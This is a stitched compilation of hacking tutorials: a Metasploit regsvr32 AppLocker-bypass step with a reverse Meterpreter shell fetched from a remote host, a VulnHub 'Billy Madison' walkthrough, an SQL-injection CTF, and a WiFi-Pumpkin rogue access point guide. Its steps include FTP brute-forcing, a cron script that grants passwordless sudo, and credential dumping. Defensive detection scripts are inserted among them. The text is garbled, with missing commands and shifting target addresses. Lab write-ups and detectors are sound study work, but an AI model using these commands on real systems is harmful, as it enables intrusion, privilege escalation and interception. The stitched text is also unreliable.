Today we will see how to obtain a Meterpreter session on a PC in the network that is switched on but locked.
Next, we run Metasploit on our own PC:
msfconsole
Thereafter, we search for regsvr32_applocker_bypass_server, use the exploit, set the payload, lhost and lport, and run it:
use exploit/windows/misc/regsvr32_applocker_bypass_server
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.106
set lport 4444
exploit
Regsvr32 /s /n /u /i:http://192.168.0.106:8080/nKCCncmdb.sct scrobj.dll
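On the defender's side, the regsvr32 pattern above stands out in process-creation telemetry. The following Python is an added example (not from the original post and not part of Metasploit) that flags regsvr32 command lines which fetch their install script over the network or load scrobj.dll; the sample command lines are constructed, with the first mirroring the one shown above.

```python
import re

# Constructed sample process-creation command lines (as Sysmon Event ID 1 or
# Security event 4688 would record them); none come from a real host. The
# first one mirrors the command the walkthrough above has the target run.
SAMPLE_COMMAND_LINES = [
    r'regsvr32 /s /n /u /i:http://192.168.0.106:8080/nKCCncmdb.sct scrobj.dll',
    r'regsvr32.exe /s "C:\Program Files\Vendor\component.dll"',
    r'REGSVR32 /u /s C:\Windows\System32\msxml3.dll',
    r'regsvr32.exe /i:C:\Users\Public\stage.sct scrobj.dll',
    r'"C:\Windows\System32\regsvr32.exe" /s /i:https://cdn.invalid/x.sct scrobj.dll',
    r'notepad.exe C:\Users\alice\notes.txt',
]

REMOTE_TARGET = re.compile(r'^(https?|ftp)://|^\\\\', re.IGNORECASE)  # URL or UNC path
INSTALL_SWITCH = re.compile(r'^[/-]i:(.+)$', re.IGNORECASE)          # /i:<script>


def regsvr32_indicators(cmdline: str) -> list[str]:
    """Return the reasons a command line matches the regsvr32 scriptlet
    (AppLocker-bypass) pattern; an empty list means nothing suspicious."""
    tokens = cmdline.split()
    if not tokens:
        return []
    # Basename of the image, tolerant of quoting and of a full path.
    image = re.split(r'[\\/]', tokens[0].strip('"'))[-1].lower()
    if image not in ('regsvr32', 'regsvr32.exe'):
        return []
    reasons = []
    for tok in tokens[1:]:
        tok = tok.strip('"')
        if tok.lower() == 'scrobj.dll':
            reasons.append('loads scrobj.dll, the Windows Script Component runtime')
        m = INSTALL_SWITCH.match(tok)
        if m and REMOTE_TARGET.match(m.group(1)):
            reasons.append(f'/i: fetches its install script from {m.group(1)}')
        elif m and m.group(1).lower().endswith('.sct'):
            reasons.append(f'/i: points at a local scriptlet {m.group(1)}')
    return reasons


def detect(cmdlines: list[str]) -> list[tuple[str, list[str]]]:
    """Run the indicator check over a batch of command lines and keep the hits."""
    return [(c, r) for c in cmdlines if (r := regsvr32_indicators(c))]


if __name__ == '__main__':
    for cmd, why in detect(SAMPLE_COMMAND_LINES):
        print(cmd, '->', '; '.join(why))
```

Legitimate COM registration (a local DLL, no /i: URL, no scrobj.dll) passes through untouched, so the check can run over every regsvr32 start without drowning in noise.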
Download the lab from https://www.vulnhub.com/entry/billy-madison-11,161/
Walkthrough
netdiscover
Our target is 192.168.1.103. Scan it with nmap.
nmap -p- -A 192.168.1.103
Okay! So from nmap we have discovered the open ports: 22, 23, 69, 80, 137, 138, 139, 445, 2525. So I opened our target in the browser at port 69. A WordPress website opens. I explored it a lot and tried to exploit it, but it was useless. So I simply opened our target in the browser at its default port, i.e. 80. The following page opens.
Then I explored the SMB port.
smbclient -L 192.168.0.103
When it asks for a password, just hit Enter without entering one.
It just told us that the backdoor is currently closed. So I then tried telnet.
telnet 192.168.0.103
Decoding it gives exschmenuating. This could be a directory, so I opened it in the browser.
In the browser it opened a webpage that gave us a few hints for moving forward. From it we conclude that there is a .cap file whose name is derived from rockyou.txt.
There are many names in rockyou.txt, but we only need the ones containing Veronica; for that, use the following command:
Executing the above command creates a text file containing only the names with Veronica in them. Now use this text file to find the file with Veronica in its name through DirBuster: open DirBuster, enter the URL in the Target URL box, give the path of the text file you just created with grep, enter the directory name in the "Dir to start with" box, and give cap as the file extension.
As a result, it will show you the file 012987veronica.cap.
Open it in the browser. It will ask you to download it; go ahead with it.
Now check the TCP stream of every packet. In one of them, you will find an email sent from Eric to Veronica, telling her to download a certain antivirus. In another TCP stream, you will find that Veronica has replied to Eric, asking him to share the link through the FTP server along with a YouTube link.
In yet another TCP stream, you will find that Eric has told her his username and password.
Then, to check, I fired up nmap again.
nmap -p- 192.168.0.103
ftp 192.168.0.103
dir
There is a file named .notes. I decided to read it, but first I had to download it, so type:
get .notes
exit
Now that the notes file is downloaded, type the following command in the Kali terminal to read it:
cat .notes
There was a message in the notes from Eric. If you remember the conversation between Veronica and Eric, you know that there are two users on the FTP server; the second one is Veronica. Naturally, I decided to use hydra to brute-force FTP for the username and password, using the same dictionary file I had created with grep.
And yes!! We have the username and password, i.e. veronica and [email protected]
ftp 192.168.0.103
dir
binary
get eg-01.cap
get email-from-billy.eml
Next, I ran aircrack-ng on eg-01.cap, because the email that was sent through swaks mentioned something about the wifi password.
With aircrack-ng, we found the wireless password, i.e. triscuit*.
nmap -p- -A 192.168.0.103
Then give the password triscuit*. Once I was logged in, I checked its Linux version with the following command, but it was not exploitable. Then I typed the following command to see what it had to offer:
ls
There I found a text file, so I decided to read it.
cat why-1974.txt
I was pretty lost here, so I took some help from Mr Goblin (https://g0blin.co.uk/billy-madison-1-vulnhub-writeup/) and typed the following set of commands:
touch /tmp/test
/usr/local/share/sgml/donpcgd /tmp/test /etc/cron.hourly/test
echo -e '#!/bin/bash\necho "eric ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers' > /etc/cron.hourly/test
chmod +x /etc/cron.hourly/test
cat /etc/cron.hourly/test
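From the defending side, the steps above leave two artefacts behind: a script in /etc/cron.hourly owned by an unprivileged user, and a passwordless sudo rule for that user. The following Python is an added example (not from the original post or the g0blin writeup) that audits a sudoers file and an `ls -l` listing of /etc/cron.hourly for exactly those two things; both inputs are constructed samples.

```python
import re

# Constructed samples (not from a real host): a sudoers file and the output of
# `ls -l /etc/cron.hourly`, each with one entry planted the way the walkthrough does.
SUDOERS_SAMPLE = """\
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
eric ALL=(ALL) NOPASSWD:ALL
backup  ALL=(root) NOPASSWD: /usr/bin/rsync
"""

CRON_HOURLY_SAMPLE = """\
-rwxr-xr-x 1 root root 372 Jan  1  2020 0anacron
-rwxr-xr-x 1 eric eric  72 Mar  3 14:07 test
-rw-rw-rw- 1 root root  10 Mar  3 14:08 placeholder
"""

# user  host=(runas) [Tag:...] NOPASSWD: commands  -- comments and %group rules skipped
NOPASSWD_RULE = re.compile(r'^(?P<who>[^#%\s]\S*)\s+\S*\s*=.*\bNOPASSWD:\s*(?P<cmds>.+)$')


def find_nopasswd(sudoers_text: str) -> list[tuple[str, str]]:
    """Return (user, commands) for every user-level NOPASSWD rule other than root's."""
    hits = []
    for line in sudoers_text.splitlines():
        m = NOPASSWD_RULE.match(line.strip())
        if m and m.group('who') != 'root':
            hits.append((m.group('who'), m.group('cmds').strip()))
    return hits


def audit_cron_listing(listing: str) -> dict[str, list[str]]:
    """Flag cron.hourly entries not owned by root or writable by group/others."""
    findings: dict[str, list[str]] = {}
    for line in listing.splitlines():
        parts = line.split(None, 8)  # perms links owner group size mon day time name
        if len(parts) < 9:
            continue
        perms, owner, name = parts[0], parts[2], parts[8]
        reasons = []
        if owner != 'root':
            reasons.append(f'owned by {owner}, not root')
        if perms[5] == 'w' or perms[8] == 'w':
            reasons.append('writable by group or others')
        if reasons:
            findings[name] = reasons
    return findings


if __name__ == '__main__':
    print(find_nopasswd(SUDOERS_SAMPLE))
    print(audit_cron_listing(CRON_HOURLY_SAMPLE))
```

A scoped rule such as backup's rsync entry is reported too, so the caller can distinguish a deliberate, narrow grant from a blanket NOPASSWD:ALL.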
ls
I decided to look into the /PRIVATE directory.
cd /PRIVATE
ls
Here I found the files hint.txt and BowelMovement. First I opened hint.txt.
cat hint.txt
In this file he talks about the BowelMovement file and about its password, which comes from the link given. So I copied the BowelMovement file into /var/www/html to download it from there.
cp BowelMovement /var/www/html
And then I created a dictionary file using cewl and that link.
cewl --depth 0 https://en.wikipedia.org/wiki/Billy_Madison > /root/Desktop/billt.txt
By brute force, you will find the correct password in this dictionary file. Using that password, open the BowelMovement file that you downloaded.
Then open it in the Kali terminal and type:
ls
There is a file called secret.zip; unzip it.
unzip secret.zip
In the zipped folder there were two files. I decided to read them both.
cat THE-END.txt
cat Billy_Madison12th_Grade_Fimal_Project.doc
Finally! We have solved the CTF. Enjoy!
This is another article in the Boot2Root series of CTF challenges. This lab was prepared by HollyGracefull. It is a preview of the original lab, which simulates an e-commerce web application containing common security flaws. The current vulnerabilities are listed below:
- SQL Injection (Error-based)
- SQL Injection (Blind)
- Reflected Cross-Site Scripting
- Stored Cross-Site Scripting
- Insecure Direct-Object Reference
- Username Enumeration
- Path Traversal
- Exposed phpinfo()
- Exposed Administrative Interface
- Weak Admin Credentials
Walkthrough
netdiscover
Our target is 192.168.1.8.
The only port we found open was 80. Next, we fire up Nikto.
Through Nikto we discovered two directories: /admin/ and /images/.
Opening it in the browser, we found that it was an e-commerce site, as hinted by the author. We checked every tab but found nothing, except in the blog tab.
In the blog tab, when you hover the mouse pointer over "admin" in the phrase, it changes from an arrow to a hand, which indicates that it is clickable.
Copy the cookie string and paste it into a plain text file.
Then start the SQL injection attack by typing the following command in the Kali terminal.
Here, /root/Desktop/sea.txt is the path of the text file in which we saved the cookie.
This command gives us the names of the following databases.
Out of these databases, we will dump the tables of seattle with the following command:
With that, we have all the table names, as you can see in the following image.
Next, we will dump the columns of the tables with the following command:
Executing the above command shows the table names as follows:
Among the table names there is a table password. We already have the admin username and just want the password, so we dump the contents of the password table.
And voila! We have the password, i.e. Assasin1.
Now in the browser, go to the My Account tab, where you will find a login portal. Enter the admin username and password and click Login.
And you will be logged in as the admin.
This CTF does not contain any flag. All that was required was to get admin access, and yooohoooo!! We have that.
WiFi-Pumpkin is an open-source security tool that provides a rogue access point for man-in-the-middle and network attacks. Using WiFi-Pumpkin, one can create a wifi network that captures all the requests made by any device that connects to it.
First of all, you need to download WiFi-Pumpkin and install it on your Kali Linux. To download WiFi-Pumpkin, go to https://github.com/P0cL4bs/WiFi-Pumpkin and click on Clone or Download. Then copy the URL to the clipboard, open the terminal and type:
Next, go to the WiFi-Pumpkin directory in the terminal. For example, if the repo was downloaded to the Desktop, type:
cd Desktop/WiFi-Pumpkin
./installer.sh --install
Thereafter, run wifi-pumpkin:
This opens the WiFi-Pumpkin GUI. Now select the network adapter and change the SSID from the default PumpAP to a name of your choice.
Then click the Start button. This creates a new wifi zone with the name entered in the SSID field.
As soon as any device connects to this wifi network, its details are shown in the table on the right. Select a target device from the list of connected devices and choose Active Driftnet from the Tools menu.